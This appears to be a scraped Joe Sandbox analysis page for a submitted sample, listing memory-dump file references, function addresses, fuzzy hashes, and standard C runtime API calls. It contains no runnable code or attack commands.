Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b231405a78ef3ce4fdc6013ff621c3d8bf21238fd61fe39e917e6f167fad45b2
Instruction ID: 7e13ae58cd3f5952bda987674f4c7dab4b214d45e0f20e38f42e0b05a72ec561
Opcode Fuzzy Hash: b231405a78ef3ce4fdc6013ff621c3d8bf21238fd61fe39e917e6f167fad45b2
Instruction Fuzzy Hash: DF210172608356EBC300AF15C98191AF7B2BFC8710F61C91DF8990B301D7B1A8118B82

Function 0086BB66 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0086BBEC

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: aa5b49d0e479a74df014bce19108996e6805c71859ec1d74824b40d9d29efc22
Instruction ID: 9ccbf5bd609cf798fdf5a6b1eb81107f3edad1278b55e32e912402d71f219c1f
Opcode Fuzzy Hash: aa5b49d0e479a74df014bce19108996e6805c71859ec1d74824b40d9d29efc22
Instruction Fuzzy Hash: 0AB18932A002599FDB118F68CC82BEE7BA5FF15358F164165E904EF282D774D981C7A1

Function 008572D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00857307
___except_validate_context_record.LIBVCRUNTIME ref: 0085730F
_ValidateLocalCookies.LIBCMT ref: 00857398
__IsNonwritableInCurrentImage.LIBCMT ref: 008573C3
_ValidateLocalCookies.LIBCMT ref: 00857418

Strings

csm, xrefs: 008573AD

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 065e0b2fdf4ea7acda622ef9c4e281cd64babd3814721e94ffc32678ce9810c5
Instruction ID: fa5aa40126e522e0daf14a19282774c388206a33bb71d3d1099effa1690aa918
Opcode Fuzzy Hash: 065e0b2fdf4ea7acda622ef9c4e281cd64babd3814721e94ffc32678ce9810c5
Instruction Fuzzy Hash: 7A41B130A04219DBCF10DF68D885AAEBBA5FF44329F54C095EC18EB352D7319909DB92

Function 0083D260 Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0083D28A
std::_Lockit::_Lockit.LIBCPMT ref: 0083D2AC
std::_Lockit::~_Lockit.LIBCPMT ref: 0083D2D4
__Getcoll.LIBCPMT ref: 0083D39F
std::_Lockit::~_Lockit.LIBCPMT ref: 0083D40E

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
String ID:
API String ID: 2318601406-0
Opcode ID: 2207d5e4288a5fb29686d6f4c284a309694ca6f93972343623ff990304315654
Instruction ID: 68ac3d2127073e25cfc06ce7b8a49f3ec1a239c80224cf6bc90d3ddae1be1df8
Opcode Fuzzy Hash: 2207d5e4288a5fb29686d6f4c284a309694ca6f93972343623ff990304315654
Instruction Fuzzy Hash: D8516AB1801248DFDB11DF98E5447AEBBB4FF41314F248059E815AB391DB79AE09CBE2

Function 0083A060 Relevance: 6.1, APIs: 4, Instructions: 136COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0083A09D
std::_Lockit::_Lockit.LIBCPMT ref: 0083A0BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0083A0E7
std::_Lockit::~_Lockit.LIBCPMT ref: 0083A223

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000ED7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EDB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F12000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F16000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000F1A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_820000_tMO4FVIc9l.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 9fe6e2c5e8d435285bd1905d3685fd78019a9186e03ccd8f1501a2d4cd43d912
Instruction ID: 0c41f078e85025871d06da8bd9e9c9acdd88e53e2a3755d5875fe3b3cc802222
Opcode Fuzzy Hash: 9fe6e2c5e8d435285bd1905d3685fd78019a9186e03ccd8f1501a2d4cd43d912
Instruction Fuzzy Hash: D45198B0D01249DBCB25CF98C9417AEBBF0FF12714F148158D895AB391EB75AA48CBD2

Function 0083C430 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0083C45A
std::_Lockit::_Lockit.LIBCPMT ref: 0083C47C
std::_Lockit::~_Lockit.LIBCPMT ref: 0083C4A4
std::_Lockit::~_Lockit.LIBCPMT ref: 0083C5C4

Memory Dump Source

Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true

Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DE7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000DF9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E3E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E41000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E61000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E73000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E85000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2257697982.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
